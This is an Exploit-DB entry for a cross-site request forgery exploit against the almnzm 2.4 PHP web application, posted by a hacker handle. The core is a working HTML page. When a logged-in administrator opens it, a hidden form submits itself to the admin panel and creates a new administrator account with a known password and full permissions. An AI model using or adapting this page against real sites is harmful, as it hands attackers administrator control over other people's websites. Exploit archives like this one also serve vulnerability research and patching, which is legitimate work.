almnzm 2.4 - Cross-Site Request Forgery (Add Admin)

EDB-ID:

18495

CVE:


EDB Verified:

Author:

HaNniBaL KsA

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2012-02-18

Vulnerable App: 
# Title: almnzm 2.4 <= CSRF Vulnerability (Add Admin)
# Vendor: almnzm.com
# Author: HaNniBaL KsA (HK)
# Email: hk@r00t-s3c.com
# Home: r00t-s3c.com
# Published: 2o12-o2-1o
#
#-------------------------------------------------------
#
# CSRF Exploit (Add a New Admin) :

<center><b><font face="Tahoma" size="5">[ <font color="#FF0000">Priv8</font> ]
<span dir="ltr"><font color="#FF0000">Almnzm 2.4</font><font color="#ffffff">
</font></span> CSRF Exploit!! </font><font face="Tahoma" size="2">>></font><font face="Tahoma" size="5"> </font>
<font color="#FF0000" face="Tahoma" size="2">Add New Admin :D</font></b></p>
<p align="center"><b><font face="Tahoma">By: <font color="#FF0000">HaNniBaL 
KsA</font> (<font color="#FF0000">HK</font>)</font></b></p><center>

<b><font face="Tahoma"><a href="http://www.r00t-s3c.com">www.r00t-s3c.com</a></font></b><br /><br />
<form name="add" action="http://www.target.com/PATH/admincpanel/index.php?action=doadd" method="post">
<table width="90%" cellspacing="1" cellpadding="4"><tr><td ><p align="center">
UserName: <input size=20 type="text" name="name" value="HK" ></td></tr><tr><td ><p align="center">
PassWord: <input size=20 type="password" name="password" value="123456" ></td></tr><tr><td ><p align="center">
E-mail: <input size=20 type="text" name="email" value="i@r00t-s3c.com" ></td></tr><tr><td><center>
<table border=0><tr><td><tr><td>
<! --
NOTE!:
The value id'z for admin privileges can be change in any site :D "down in checkbox'z!"
^ so ? .. maybe this exploit will add a new admin but without administrator permissions "just user xD"!!
-->
<input type=checkbox type=hidden name=authorities1 value=25 checked></td></tr><tr><td>
<input type=checkbox type=hidden name=authorities2 value=24 checked></td></tr><tr><td>
<input type=checkbox type=hidden name=authorities3 value=34 checked></td></tr><tr><td>
<input type=checkbox type=hidden name=authorities4 value=41 checked></td></tr><tr><td>
<input type=checkbox type=hidden name=authorities5 value=39 checked></td></tr><tr><td>
<input type=checkbox type=hidden name=authorities6 value=12 checked></td></tr><tr><td>
<input type=checkbox type=hidden name=authorities7 value=21 checked></td></tr><tr><td>
<input type=checkbox type=hidden name=authorities8 value=38 checked></td></tr><tr><td>
<input type=checkbox type=hidden name=authorities9 value=9 checked></td></tr><tr><td>
<input type=checkbox type=hidden name=authorities10 value=2 checked></td></tr><tr><td>
<input type=checkbox type=hidden name=authorities11 value=3 checked></td></tr><tr><td>
<input type=checkbox type=hidden name=authorities12 value=4 checked></td></tr><tr><td>
<input type=checkbox type=hidden name=authorities13 value=5 checked></td></tr><tr><td>
<input type=checkbox type=hidden name=authorities14 value=6 checked></td></tr><tr><td>
<input type=checkbox type=hidden name=authorities15 value=11 checked></td></tr><tr><td>
<input type=checkbox type=hidden name=authorities16 value=44 checked></td></tr><tr><td>
<input type=checkbox type=hidden name=authorities17 value=50 checked></td></tr><tr><td>
<input type=checkbox type=hidden name=authorities18 value=18 checked></td></tr><tr><td>
<input type=checkbox type=hidden name=authorities19 value=30 checked></td></tr><tr><td>
<input type=checkbox type=hidden name=authorities20 value=14 checked></td></tr><tr><td>
<input type=checkbox type=hidden name=authorities21 value=37 checked></td></tr><tr><td>
<input type=checkbox type=hidden name=authorities22 value=35 checked></td></tr><tr><td>
<input type=checkbox type=hidden name=authorities23 value=43 checked></td></tr></table></td></tr>
<input type="hidden" name="formtype" value="add">
<input type="hidden" name="componentid" value="39"></center>
<! --
Greet'z to:
r00t-s3c.com & alm3refh.com
-->
<tr><td><p align="center">
<input size=50 type="submit" name="submit" value="Add New Admin :D" ></td></tr></table></center></form>
<script>document.add.submit();</script>

#
# The New Admin Login Info :
# UserName: HK
# PassWord: 123456
#
#-------------------------------------------
# Greet'z to :
# Dr.S!lv3r - MR.DH - AL-K!NG - Dr.KroOoZ - 0r4ng-M4n - r3xb0t3r .. So on ! xD
# S.Greet'z to : r00t-s3c.com & alm3refh.com
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services